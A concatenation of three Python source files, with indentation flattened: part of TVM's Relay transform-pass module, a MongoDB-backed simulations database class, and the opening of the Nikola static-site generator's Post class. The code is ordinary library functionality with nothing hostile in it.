# initialize handle in cass pass_cls creation failed.fg
self.handle = None
inst = pass_cls(*args, **kwargs)
# it is important not to capture self to
# avoid a cyclic dependency
def _pass_func(func, mod, ctx):
return inst.transform_function(func, mod, ctx)
self.__init_handle_by_constructor__(_ffi_api.MakeFunctionPass, _pass_func, pass_info)
self._inst = inst
def __getattr__(self, name):
# fall back to instance attribute if there is not any
return self._inst.__getattribute__(name)
functools.update_wrapper(PyFunctionPass.__init__, pass_cls.__init__)
PyFunctionPass.__name__ = pass_cls.__name__
PyFunctionPass.__doc__ = pass_cls.__doc__
PyFunctionPass.__module__ = pass_cls.__module__
return PyFunctionPass
def function_pass(pass_func=None, opt_level=None, name=None, required=None):
"""Decorate a function pass.
This function returns a callback when pass_func
is provided. Otherwise, it returns the created function pass using the
given optimization function.
Parameters
----------
pass_func : Optional[Callable[(Function, Module, PassContext) -> Function]]
The transformation function or class.
opt_level : int
The optimization level of this module pass.
name : Optional[str]
The name of the function pass. The name could be empty. In this case, the
name of the optimization function will be used as the pass name.
required : Optional[List[str]]
The list of passes that the module pass is dependent on.
Returns
-------
create_function_pass : Union[Callable, FunctionPass]
A decorator will be returned if pass_func is not provided,
otherwise return the decorated result.
The returned decorator has two behaviors depending on the input:
A new FunctionPass will be returned when we decorate a pass function.
A new FunctionPass class will be returned when we decorate a class type.
Examples
--------
The following code block decorates a function pass class.
.. code-block:: python
@relay.transform.function_pass(opt_level=1)
class TestReplaceFunc:
def __init__(self, new_func):
self.new_func = new_func
def transform_function(self, func, mod, ctx):
# just for demo purposes
# transform func to new_func
return self.new_func
x = relay.var("x", shape=(10, 20))
f1 = relay.Function([x], x)
f2 = relay.Function([x], relay.log(x))
# fpass is now a special pass that replaces every
# function to f1
fpass = TestReplaceFunc(f1)
# now every function in input_mod is replaced by f1
res_mod = fpass(input_mod)
The following code creates a function pass by decorating
a user defined transform function.
.. code-block:: python
@relay.transform.function_pass(opt_level=2)
def transform(func, mod, ctx):
# my transformations here.
return func
function_pass = transform
assert isinstance(function_pass, transform.FunctionPass)
assert function_pass.info.opt_level == 2
# Given a module m, the optimization could be invoked as the follwoing:
updated_mod = function_pass(m)
# Now constant folding should have been applied to every function in
# the provided module m. And the updated module will be returned.
"""
if opt_level is None:
raise ValueError("Please provide opt_level for the function pass.")
required = required if required else []
if not isinstance(required, (list, tuple)):
raise TypeError("Required is expected to be the type of " + "list/tuple.")
def create_function_pass(pass_arg):
"""Internal function that creates a function pass"""
fname = name if name else pass_arg.__name__
info = tvm.transform.PassInfo(opt_level, fname, required)
if inspect.isclass(pass_arg):
return _wrap_class_function_pass(pass_arg, info)
if not isinstance(pass_arg, (types.FunctionType, types.LambdaType)):
raise TypeError("pass_func must be a callable for Module pass")
return _ffi_api.MakeFunctionPass(pass_arg, info)
if pass_func:
return create_function_pass(pass_func)
return create_function_pass
@function_pass(opt_level=1)
class ChangeBatch:
"""
Change the batch size.
Parameters
----------
data: Dict[relay.Var, int]
A dictionary of all the params to change.
The keys are all params, and the values are which dimension hold the batch.
batch_size: int
The batch size to change to.
Returns
-------
pass: FunctionPass
The pass.
"""
def __init__(self, data, batch_size=16):
self.data = data
self.batch_size = batch_size
def transform_function(self, func, mod, ctx):
func = relay.Function(func.params, func.body, None, func.type_params, func.attrs)
change_batch = self
class ChangeBatchMutator(tvm.relay.ExprMutator):
def visit_var(self, var):
if var in change_batch.data:
ty = var.type_annotation
new_shape = list(ty.shape)
new_shape[change_batch.data[var]] = change_batch.batch_size
return relay.Var(var.name_hint, relay.TensorType(new_shape, ty.dtype))
return var
return ChangeBatchMutator().visit(func)
def DenseToSparse(weight_name, weight_shape):
"""
Rewrite qualified ```nn.dense operation``` to ```nn.sparse_dense```
This pass is used in ```data_dep_optimization.bsr_dense```
Parameters of this pass is generated by ```analysis.sparse_dense.process_params```
Parameters
----------
weight_name: Array[String]
Names of weights which qualified sparse contrains
weight_shape: Array[Array[IntImm]]
Weights shape in BSR format.
Returns
-------
ret : tvm.transform.Pass
The registered DenseToSparse pass.
"""
return _ffi_api.DenseToSparse(weight_name, weight_shape)
def Conv2dToSparse(weight_name, weight_shape, layout, kernel_size):
"""
Rewrite qualified ```nn.conv2d operation``` to ```nn.sparse_conv2d```
Parameters
----------
weight_name: Array[String]
Names of weights which qualified sparse contrains
weight_shape: Array[Array[IntImm]]
Weights shape in BSR format.
layout : str
layout of data
Returns
-------
ret : tvm.transform.Pass
The registered DenseToSparse pass.
"""
return _ffi_api.Conv2dToSparse(weight_name, weight_shape, layout, kernel_size)
def Conv2dToSparse2(layout, kernel_size, blocksize, sparsity_threshold):
"""
Rewrite freezed ```nn.conv2d``` operation to ```nn.sparse_conv2d```
Parameters
----------
layout : str
layout of data
kernel_size : int
kernel size of conv2d
Returns
-------
ret : tvm.transform.Pass
The registered DenseToSparse pass.
"""
return _ffi_api.Conv2dToSparse2(layout, kernel_size, *blocksize, sparsity_threshold)
def SimplifyFCTranspose(target_weight_name):
"""
Rewrite ```y = nn.dense(x, transpose(w, [1, 0]))``` to ```y = nn.dense(x, wt)```
This pass is used in ```data_dep_optimization.simplify_fc_transpose```
Parameters
----------
weight_name: Array[String]
Names of weights which qualified ```y = nn.dense(x, transpose(w, [1, 0]))```
This parameter is generated by ```analysis.search_fc_transpose``` function
Returns
-------
ret : tvm.transform.Pass
The registered SimplifyFCTranspose pass.
"""
return _ffi_api.SimplifyFCTranspose(target_weight_name)
def SimplifyExpr():
"""
Simplify the Relay expression, including merging consecutive reshapes.
Returns
-------
ret : tvm.transform.Pass
The registered SimplifyExpr pass.
"""
return _ffi_api.SimplifyExpr()
def PlanDevices(config):
"""
Uses existing "on_device" and "device_copy" calls to infer the virtual device on which
every Relay sub-expression should run and the result stored. Captures the result of that
analysis using new "on_device" and "device_copy" calls. Sub-expressions which are
not otherwise constrained are assigned to the default primitive virtual device describe by
config. However data and computations which must be hosted on a CPU (such as shapes and
shape functions) use the host virtual device of the config.
Parameters
----------
config : tvm.CompilationConfig
The compilation configuration, specifying available targets and default devices.
Returns
-------
ret : tvm.transforms.Pass
The pass.
"""
return _ffi_api.PlanDevices(config)
def FoldExplicitPadding():
"""
FoldExplicitPadding finds explict padding before an op that can support
implicit padding and fuses them.
Returns
-------
ret : tvm.transform.Pass
The registered ImplicitPadding pass.
"""
return _ffi_api.FoldExplicitPadding()
def AnnotateSpans():
"""
Annotate a program with span information by first generating its textual
representation and then parsing it back into a Relay AST annotated with
span information.
Returns
-------
ret : tvm.transform.Pass
The registered AnnotateSpans pass.
"""
return _ffi_api.AnnotateSpans()
def FakeQuantizationToInteger(hard_fail=False):
# pylint: disable=anomalous-backslash-in-string
"""
Find regions of the graph of the form
.. code-block:: text
x w
| |
dq dq
\\ /
op1
|
op2
|
q
where ``q == qnn.quantize`` and ``dq = qnn.dequantize``
and rewrite them into integer versions of ``op1`` and ``op2``
Rules for rewriting indivdual ops are in fake_quantization_to_integer.py
Parameters
----------
hard_fail : boolean
How do deal with errors during graph rewriting.
If true, raise an error.
If false, skip rewriting the subgraph.
Returns
-------
ret : tvm.transform.Pass
The registered SimplifyExpr pass.
"""
return _ffi_api.FakeQuantizationToInteger(hard_fail)
def ToMixedPrecision(mixed_precision_type="float16", missing_op_mode=1):
"""
Automatic mixed precision rewriter. Rewrite an FP32 relay graph into a version
where as many operations as possible are in the target mixed_precision_type.
Parameters
----------
mixed_precision_type: str
The target datatype to transform operations in the graph to use.
missing_op_mode: int
Determines how to handle ops not registered with FTVMMixedPrecisionConversionType
0: Does not allow any missing ops. Will throw errors when encountering any.
1: Allow missing ops but emit warnings.
2: Allow missing ops and silently ignore them.
Returns
-------
ret : tvm.transform.Pass
The registered pass.
"""
if missing_op_mode < 0 or missing_op_mode > 2:
raise ValueError("Missing op mode is either 0, 1, or 2")
return _ffi_api.ToMixedPrecision(mixed_precision_type, missing_op_mode)
def SplitArgs(max_function_args):
"""Split function with huge number of arguments to smaller pieces.
Returns
-------
ret : tvm.transform.Pass
The registered pass for constant folding.
"""
return _ffi_api.SplitArgs(max_function_args)
# added by Archermmt 2021-01-10
def InferLayout():
"""Infer the layouts of tensors
Returns
-------
ret : tvm.transform.Pass
The registered pass to infer layouts follow forward direction
Note
----
Should be work together with BackwardInferLayout
"""
return _ffi_api.InferLayout()
|
# pythom 2+3 compatibility
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import super
import bson
import logging
import datetime
from ..common import try_reduce
from .. import units
from .simulationsdb import SimulationsDB
log = logging.getLogger(__name__)
class MongoSimsDB(SimulationsDB):
"""
Define a (mostly) concrete implementation of a SimulationssDB with a
MongoDB backend. Users may want to use this class as a base or template for
adding their own features.
In this implementation, no assumptions are made about the structure of each
dataset. The class constructor takes several functions that are called
to generate queries. Values requested for ecvaluation should be SimDocEval
objects which know how to parse and combine values.
"""
def __init__(self, collection, buildqueries, livetime, livetimepro=None,
summaryview=None,
**kwargs):
"""Create a new SimulationsDB interface to a mongodb backend.
Args:
collection : pymongo.Collection holding the simulation data. Any
necessary indices should already by applied
buildqueries (func): a function to generate database queries for
a SimDataRequest object. For each separate
query generated, the function should call
`request.addquery` with appropriate weight.
This function should also take into account
modifiers to the queries accessible from
`request.getquerymods`. A static function
`MongoSimsDB::modquery` to do a simple
`dict.update` for each mod.
livetime (func): a function to calculate the livetime for a
collection of datasets. Takes 2 arguments:
a SimDataMatch and a list of documents retrieved
from the database. Do not modify the match object!
livetimepro (dict): projection document when querying for livetime
summaryview (dict): mapping document to apply to each entry
when producing a summary table
"""
# initialize the DB connection
self.collection = collection
self.buildqueries = buildqueries
self.livetime = livetime
self.livetimepro = livetimepro
# initialize the base class
super().__init__(**kwargs)
########### required simulationsdb overrides ##############
def genqueries(self, match, findnewdata=True):
# call the callback to generate queries
matches = self.buildqueries(match)
# attach and interpret data
if findnewdata:
# make sure its iterable
if not matches:
matches = []
elif not isinstance(matches, (list, tuple, set)):
matches = [matches]
for match in matches:
hits = tuple(self.collection.find(match.query,
self.livetimepro))
dataset = list(str(d['_id']) for d in hits)
livetime = 0*units.year
if not dataset:
match.addstatus('nodata')
else:
try:
livetime = self.livetime(match, hits)
except ZeroDivisionError:
pass
match.dataset = dataset
match.livetime = livetime
return matches
def _eval_match(self, values, match):
""" Evaluate a set of database hits over all values """
result = [None for _ in values]
projection = {}
for value in values:
projection = value.project(projection)
dataset = match.dataset
if not dataset:
return result
if not isinstance(dataset, (list, tuple)):
dataset = (dataset,)
elif isinstance(dataset, list):
dataset = tuple(dataset)
for entry in dataset:
# ID should be an object ID, but don't raise a fuss if not
try:
entry = bson.ObjectId(entry)
except bson.errors.InvalidId:
pass
try:
doc = self.collection.find_one({'_id': entry}, projection)
except Exception as e:
log.error("Caught exception '%s' querying database with projection %s",e, projection)
doc = None
if not doc:
# Entry should have been for an existing document, so
# something went really wrong here...
raise KeyError("No document with ID %s in database" % entry)
for i, v in enumerate(values):
try:
result[i] = try_reduce(v.reduce, v.parse(doc), result[i])
except Exception as e:
log.warning("Exception parsing %s in dataset %s: %s",
v.label, doc.get('_id','<no id>'), e)
# now normalize everything
for i, v in enumerate(values):
if result[i] is None:
continue
try:
result[i] = v.norm(result[i], match)
except Exception as e:
log.warning("Caught exception normalizing match %s: %e",
match.id, e)
result[i] = 0
return result
def evaluate(self, values, matches):
"""Sum up each key in values, weighted by livetime.
If entries were all numbers, we could make this more efficient by
using the aggregation pipeline. But that won't work when trying to add
histograms, so we just read each value and do the sum ourselves.
Args:
values (list) : list of SimDocEval objects that specify the projection
and interpretation of each dataset
matches (list): list of SimDataMatch objects to calculate and reduce
each value over
"""
try:
lenresult = len(values)
except TypeError:
values = [values]
lenresult = 1
result = [0]*lenresult
matches = matches if isinstance(matches, (list, tuple)) else [matches]
for match in matches:
parsed = self._eval_match(values, match)
for i, v in enumerate(values):
result[i] = try_reduce(v.reduce, parsed[i], result[i])
return result
def getdatasetdetails(self, dataset):
# dataset should be an ID but may be stringified
try:
dataset = bson.ObjectId(dataset)
except bson.errors.InvalidId: # not an object ID
pass
return self.collection.find_one(dataset)
# if isinstance(dataset, str) and dataset.startswith('['):
# try:
# dataset = json.loads(dataset)
# except json.JSONDecodeError:
# log.error("Can't convert from string list %s",dataset)
# if not isinstance(dataset,(list, tuple)):
# dataset = [bson.ObjectId(dataset)]
# return list(self.collection.find({'_id':{'$in':dataset}}))
# return [self.collection.find_one({'_id':entry}) for entry in dataset]
@staticmethod
def modquery(query, request):
"""Utility function implementing a very basic query update process.
For each requested modifer in the request, the query is updated directly
(using `dict.update`). This is mostly to serve as an example of how
to implement a more useful interperter.
"""
for mod in request.getquerymods():
if mod:
query.update(mod)
return query
def runquery(self, query, projection=None, sort=None):
pipeline = []
if query:
# allow for lazy querying
if not isinstance(query, dict):
try:
query = bson.ObjectId(query)
except bson.errors.InvalidId:
pass
query = {'_id': query}
pipeline.append({'$match': query})
if sort:
pipeline.append({'$sort': sort})
if projection:
pipeline.append({'$project': projection})
return self.collection.aggregate(pipeline)
def addentry(self, entry, fmt=''):
""" Insert a new entry into the database
Args:
entry (dict or str): representation of database document to insert
fmt (str): either 'json' or 'dict' are supported.
Returns:
key: the _id for the newly inserted entry
Raises:
NotImplementedError: if fmt is not 'json' or 'dict'
pymongo error: if database insertion fails
"""
if fmt.lower() == 'json':
entry = bson.json_util.loads(entry)
elif fmt.lower() == 'dict':
pass
else:
raise NotImplementedError("Unhandled format %s", fmt)
entry['_inserted'] = str(datetime.datetime.utcnow())
result = self.collection.insert_one(entry)
return str(result.inserted_id)
def __str__(self):
return f"MongoSimsDB({self.collection})"
|
# -*- coding: utf-8 -*-
# Copyright © 2012-2020 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""The Post class."""
import io
import datetime
import hashlib
import json
import os
import re
from collections import defaultdict
from math import ceil # for reading time feature
from urllib.parse import urljoin
import dateutil.tz
import lxml.html
import natsort
from blinker import signal
# for tearDown with _reload we cannot use 'from import' to get forLocaleBorg
import nikola.utils
from . import metadata_extractors
from . import utils
from .utils import (
current_time,
Functionary,
LOGGER,
LocaleBorg,
slugify,
to_datetime,
demote_headers,
get_translation_candidate,
map_metadata
)
try:
import pyphen
except ImportError:
pyphen = None
__all__ = ('Post',)
TEASER_REGEXP = re.compile(r'<!--\s*(TEASER_END|END_TEASER)(:(.+))?\s*-->', re.IGNORECASE)
class Post(object):
"""Represent a blog post or site page."""
def __init__(
self,
source_path,
config,
destination,
use_in_feeds,
messages,
template_name,
compiler,
destination_base=None,
metadata_extractors_by=None
):
"""Initialize post.
The source path is the user created post file. From it we calculate
the meta file, as well as any translations available, and
the .html fragment file path.
destination_base must be None or a TranslatableSetting instance. If
specified, it will be prepended to the destination path.
"""
self.config = config
self.compiler = compiler
self.compiler_contexts = {}
self.compile_html = self.compiler.compile
self.demote_headers = self.compiler.demote_headers and self.config['DEMOTE_HEADERS']
tzinfo = self.config['__tzinfo__']
if self.config['FUTURE_IS_NOW']:
self.current_time = None
else:
self.current_time = current_time(tzinfo)
self.translated_to = set([])
self._prev_post = None
self._next_post = None
self.base_url = self.config['BASE_URL']
self.is_draft = False
self.is_private = False
self.strip_indexes = self.config['STRIP_INDEXES']
self.index_file = self.config['INDEX_FILE']
self.pretty_urls = self.config['PRETTY_URLS']
self.source_path = source_path # posts/blah.txt
self.post_name = os.path.splitext(source_path)[0] # posts/blah
_relpath = os.path.relpath(self.post_name)
if _relpath != self.post_name:
self.post_name = _relpath.replace('..' + os.sep, '_..' + os.sep)
# cache[\/]posts[\/]blah.html
self.base_path = os.path.join(self.config['CACHE_FOLDER'], self.post_name + ".html")
# cache/posts/blah.html
self._base_path = self.base_path.replace('\\', '/')
self.metadata_path = self.post_name + ".meta" # posts/blah.meta
self.folder_relative = destination
self.folder_base = destination_base
self.default_lang = self.config['DEFAULT_LANG']
self.translations = self.config['TRANSLATIONS']
self.messages = messages
self.skip_untranslated = not self.config['SHOW_UNTRANSLATED_POSTS']
self._template_name = template_name
self.is_two_file = True
self._reading_time = None
self._remaining_reading_time = None
self._paragraph_count = None
self._remaining_paragraph_count = None
self._dependency_file_fragment = defaultdict(list)
self._dependency_file_page = defaultdict(list)
self._dependency_uptodate_fragment = defaultdict(list)
self._dependency_uptodate_page = defaultdict(list)
self._depfile = defaultdict(list)
if metadata_extractors_by is None:
self.metadata_extractors_by = {'priority': {}, 'source': {}}
else:
self.metadata_extractors_by = metadata_extractors_by
# Load internationalized metadata
for lang in self.translations:
if os.path.isfile(get_translation_candidate(self.config, self.source_path, lang)):
self.translated_to.add(lang)
# If we don't have anything in translated_to, the file does not exist
if not self.translated_to and os.path.isfile(self.source_path):
raise Exception(("Could not find translations for {}, check your "
"TRANSLATIONS_PATTERN").format(self.source_path))
elif not self.translated_to:
raise Exception(("Cannot use {} (not a file, perhaps a broken "
"symbolic link?)").format(self.source_path))
default_metadata, default_used_extractor = get_meta(self, lang=None)
self.meta = Functionary(lambda: None, self.default_lang)
self.used_extractor = Functionary(lambda: None, self.default_lang)
self.meta[self.default_lang] = default_metadata
self.used_extractor[self.default_lang] = default_used_extractor
# Compose paths
if self.folder_base is not None:
# Use translatable destination folders
self.folders = {}
for lang in self.config['TRANSLATIONS'].keys():
if os.path.isabs(self.folder_base(lang)): # Issue 2982
self.folder_base[lang] = os.path.relpath(self.folder_base(lang), '/')
self.folders[lang] = os.path.normpath(os.path.join(self.folder_base(lang), self.folder_relative))
else:
# Old behavior (non-translatable destination path, normalized by scanner)
self.folders = {lang: self.folder_relative for lang in self.config['TRANSLATIONS'].keys()}
self.folder = self.folders[self.default_lang]
if 'date' not in default_metadata and not use_in_feeds:
# For pages we don't *really* need a date
if self.config['__invariant__']:
default_metadata['date'] = datetime.datetime(2013, 12, 31, 23, 59, 59, tzinfo=tzinfo)
else:
default_metadata['date'] = datetime.datetime.utcfromtimestamp(
os.stat(self.source_path).st_ctime).replace(tzinfo=dateutil.tz.tzutc()).astimezone(tzinfo)
# If time zone is set, build localized datetime.
try:
self.date = to_datetime(self.meta[self.default_lang]['date'], tzinfo)
except ValueError:
if not self.meta[self.default_lang]['date']:
msg = 'Missing date in file {}'.format(source_path)
else:
msg = "Invalid date '{0}' in file {1}".format(self.meta[self.default_lang]['date'], source_path)
LOGGER.error(msg)
raise ValueError(msg)
if 'updated' not in default_metadata:
default_metadata['updated'] = default_metadata.get('date', None)
self.updated = to_datetime(default_metadata['updated'], tzinfo)
if 'title' not in default_metadata or 'slug' not in default_metadata \
or 'date' not in default_metadata:
raise ValueError("You must set a title (found '{0}'), a slug (found '{1}') and a date (found '{2}')! "
"[in file {3}]".format(default_metadata.get('title', None),
default_metadata.get('slug', None),
default_metadata.get('date', None),
source_path))
if 'type' not in default_metadata:
# default value is 'text'
default_metadata['type'] = 'text'
for lang in self.translations:
if lang != self.default_lang:
meta = defaultdict(lambda: '')
meta.update(default_metadata)
_meta, _extractors = get_meta(self, lang)
meta.update(_meta)
self.meta[lang] = meta
self.used_extractor[lang] = _extractors
if not self.is_translation_available(self.default_lang):
# Special case! (Issue #373)
# Fill default_metadata with stuff from the other languages
for lang in sorted(self.translated_to):
default_metadata.update(self.meta[lang])
# Load data field from metadata
self.data = Functionary(lambda: None, self.default_lang)
for lang in self.translations:
if self.meta[lang].get('data') is not None:
self.data[lang] = utils.load_data(self.meta[lang]['data'])
for lang, meta in self.meta.items():
# Migrate section to category
# TODO: remove in v9
if 'section' in meta:
if 'category' in meta:
LOGGER.warning("Post {0} has both 'category' and 'section' metadata. Section will be ignored.".format(source_path))
else:
meta['category'] = meta['section']
LOGGER.info("Post {0} uses 'section' metadata, setting its value to 'category'".format(source_path))
# Handle CATEGORY_DESTPATH_AS_DEFAULT
if 'category' not in meta and self.config['CATEGORY_DESTPATH_AS_DEFAULT']:
self.category_from_destpath = True
if self.config['CATEGORY_DESTPATH_TRIM_PREFIX'] and self.folder_relative != '.':
category = self.folder_relative
else:
category = self.folders[lang]
category = category.replace(os.sep, '/')
if self.config['CATEGORY_DESTPATH_FIRST_DIRECTORY_ONLY']:
category = category.split('/')[0]
meta['category'] = self.config['CATEGORY_DESTPATH_NAMES'](lang).get(category, category)
else:
self.category_from_destpath = False
self.publish_later = False if self.current_time is None else self.date >= self.current_time
self.is_draft = False
self.is_private = False
self.post_status = 'published'
self._tags = {}
self.has_oldstyle_metadata_tags = False
for lang in self.translated_to:
if isinstance(self.meta[lang]['tags'], (list, tuple, set)):
_tag_list = self.meta[lang]['tags']
else:
_tag_list = self.meta[lang]['tags'].split(',')
self._tags[lang] = natsort.natsorted(
list(set([x.strip() for x in _tag_list])),
alg=natsort.ns.F | natsort.ns.IC)
self._tags[lang] = [t for t in self._tags[lang] if t]
status = self.meta[lang].get('status')
if status:
if status == 'published':
pass # already set before, mixing published + something else should result in the other thing
elif status == 'featured':
self.post_status = status
elif status == 'private':
self.post_status = status
self.is_private = True
elif status == 'draft':
self.post_status = status
self.is_draft = True
else:
LOGGER.warning(('The post "{0}" has the unknown status "{1}". '
'Valid values are "published", "featured", "private" and "draft".').format(self.source_path, status))
if self.config['WARN_ABOUT_TAG_METADATA']:
show_warning = False
if 'draft' in [_.lower() for _ in self._tags[lang]]:
LOGGER.warning('The post "{0}" uses the "draft" tag.'.format(self.source_path))
show_warning = True
if 'private' in self._tags[lang]:
LOGGER.warning('The post "{0}" uses the "private" tag.'.format(self.source_path))
show_warning = True
if 'mathjax' in self._tags[lang]:
LOGGER.warning('The post "{0}" uses the "mathjax" tag.'.format(self.source_path))
show_warning = True
if show_warning:
LOGGER.warning('It is suggested that you convert special tags to metadata and set '
'USE_TAG_METADATA to False. You can use the upgrade_metadata_v8 '
'command plugin for conversion (install with: nikola plugin -i '
'upgrade_metadata_v8). Change the WARN_ABOUT_TAG_METADATA '
'configuration to disable this warning.')
if self.config['USE_TAG_METADATA']:
if 'draft' in [_.lower() for _ in self._tags[lang]]:
self.is_draft = True
LOGGER.debug('The post "{0}" is a draft.'.format(self.source_path))
self._tags[lang].remove('draft')
self.post_status = 'draft'
self.has_oldstyle_metadata_tags = True
if 'private' in self._tags[lang]:
self.is_private = True
LOGGER.debug('The post "{0}" is private.'.format(self.source_path))
self._tags[lang].remove('private')
self.post_status = 'private'
self.has_oldstyle_metadata_tags = True
if 'mathjax' in self._tags[lang]:
self.has_oldstyle_metadata_tags = True
# While draft comes from the tags, it's not really a tag
self.is_post = use_in_feeds
self.use_in_feeds = self.is_post and not self.is_draft and not self.is_private and not self.publish_later
# Allow overriding URL_TYPE via meta
# The check is done here so meta dicts won’t change inside of
# generic_post_rendere
self.url_type = self.meta('url_type') or None
# Register potential extra dependencies
self.compiler.register_extra_dependencies(self)
def _get_hyphenate(self):
return bool(self.config['HYPHENATE'] or self.meta('hyphenate'))
hyphenate = property(_get_hyphenate)
def __repr__(self):
"""Provide a representation of the post object."""
# Calculate a hash that represents most data about the post
m = hashlib.md5()
# source_path modification date (to avoid reading it)
m.update(str(os.stat(self.source_path).st_mtime).encode('utf-8'))
clean_meta = {}
for k, v in self.meta.items():
sub_meta = {}
clean_meta[k] = sub_meta
for kk, vv in v.items():
if vv:
sub_meta[kk] = vv
m.update(str(json.dumps(clean_meta, cls=utils.CustomEncoder, sort_keys=True)).encode('utf-8'))
return '<Post: {0!r} {1}>'.format(self.source_path, m.hexdigest())
def has_pretty_url(self, lang):
"""Check if this page has a pretty URL."""
m = self.meta[lang].get('pretty_url', '')
if m:
# match is a non-empty string, overides anything
return m.lower() == 'true' or m.lower() == 'yes'
else:
# use PRETTY_URLS, unless the slug is 'index'
return self.pretty_urls and self.meta[lang]['slug'] != 'index'
def _has_pretty_url(self, lang):
"""Check if this page has a pretty URL."""
return self.has_pretty_url(lang)
@property
def has_math(self):
"""Return True if this post has has_math set to True or is a python notebook.
Alternatively, it will return True if it has set the mathjax tag in the
current language and the USE_TAG_METADATA config setting is True.
"""
if self.compiler.name == 'ipynb':
return True
lang = nikola.utils.LocaleBorg().current_lang
if self.is_translation_available(lang):
if self.meta[lang].get('has_math') in ('true', 'True', 'yes', '1', 1, True):
return True
if self.config['USE_TAG_METADATA']:
return 'mathjax' in self.tags_for_language(lang)
# If it has math in ANY other language, enable it. Better inefficient than broken.
for lang in self.translated_to:
if self.meta[lang].get('has_math') in ('true', 'True', 'yes', '1', 1, True):
return True
if self.config['USE_TAG_METADATA']:
return 'mathjax' in self.alltags
return False
@property
def alltags(self):
"""Return ALL the tags for this post."""
tags = []
for l in self._tags:
tags.extend(self._tags[l])
return list(set(tags))
def tags_for_language(self, lang):
"""Return tags for a given language."""
if lang in self._tags:
return self._tags[lang]
elif lang not in self.translated_to and self.skip_untranslated:
return []
elif self.default_lang in self._tags:
return self._tags[self.default_lang]
else:
return []
@property
def tags(self):
"""Return tags for the current language."""
lang = nikola.utils.LocaleBorg().current_lang
return self.tags_for_language(lang)
@property
def prev_post(self):
"""Return previous post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._prev_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._prev_post
return rv
@prev_post.setter
def prev_post(self, v):
"""Set previous post."""
self._prev_post = v
@property
def next_post(self):
"""Return next post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._next_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._next_post
return rv
@next_post.setter
def next_post(self, v):
"""Set next post."""
self._next_post = v
@property
def template_name(self):
"""Return template name for this post."""
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['template'] or self._template_name
def formatted_date(self, date_format, date=None):
"""Return the formatted date as string."""
return utils.LocaleBorg().formatted_date(date_format, date if date else self.date)
def formatted_updated(self, date_format):
"""Return the updated date as string."""
return self.formatted_date(date_format, self.updated)
def title(self, lang=None):
"""Return localized title.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['title']
def author(self, lang=None):
"""Return localized author or BLOG_AUTHOR if unspecified.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self.meta[lang]['author']:
author = self.meta[lang]['author']
else:
author = self.config['BLOG_AUTHOR'](lang)
return author
def description(self, lang=None):
"""Return localized description."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['description']
def guid(self, lang=None):
"""Return localized GUID."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self.meta[lang]['guid']:
guid = self.meta[lang]['guid']
else:
guid = self.permalink(lang, absolute=True)
return guid
def add_dependency(self, dependency, add='both', lang=None):
"""Add a file dependency for tasks using that post.
The ``dependency`` should be a string specifying a path, or a callable
which returns such a string or a list of strings.
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
If ``lang`` is not specified, this dependency is added for all languages.
"""
if add not in {'fragment', 'page', 'both'}:
raise Exception("Add parameter is '{0}', but must be either 'fragment', 'page', or 'both'.".format(add))
if add == 'fragment' or add == 'both':
self._dependency_file_fragment[lang].append((type(dependency) != str, dependency))
if add == 'page' or add == 'both':
self._dependency_file_page[lang].append((type(dependency) != str, dependency))
def add_dependency_uptodate(self, dependency, is_callable=False, add='both', lang=None):
"""Add a dependency for task's ``uptodate`` for tasks using that post.
This can be for example an ``utils.config_changed`` object, or a list of
such objects.
The ``is_callable`` parameter specifies whether ``dependency`` is a
callable which generates an entry or a list of entries for the ``uptodate``
list, or whether it is an entry which can directly be added (as a single
object or a list of objects).
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
If ``lang`` is not specified, this dependency is added for all languages.
Example:
post.add_dependency_uptodate(
utils.config_changed({1: some_data}, 'uniqueid'), False, 'page')
"""
if add == 'fragment' or add == 'both':
self._dependency_uptodate_fragment[lang].append((is_callable, dependency))
if add == 'page' or add == 'both':
self._dependency_uptodate_page[lang].append((is_callable, dependency))
def register_depfile(self, dep, dest=None, lang=None):
"""Register a dependency in the dependency file."""
if not dest:
dest = self.translated_base_path(lang)
self._depfile[dest].append(dep)
@staticmethod
def write_depfile(dest, deps_list, post=None, lang=None):
"""Write a depfile for a given language."""
if post is None or lang is None:
deps_path = dest + '.dep'
else:
deps_path = post.compiler.get_dep_filename(post, lang)
if deps_list or (post.compiler.use_dep_file if post else False):
deps_list = [p for p in deps_list if p != dest] # Don't depend on yourself (#1671)
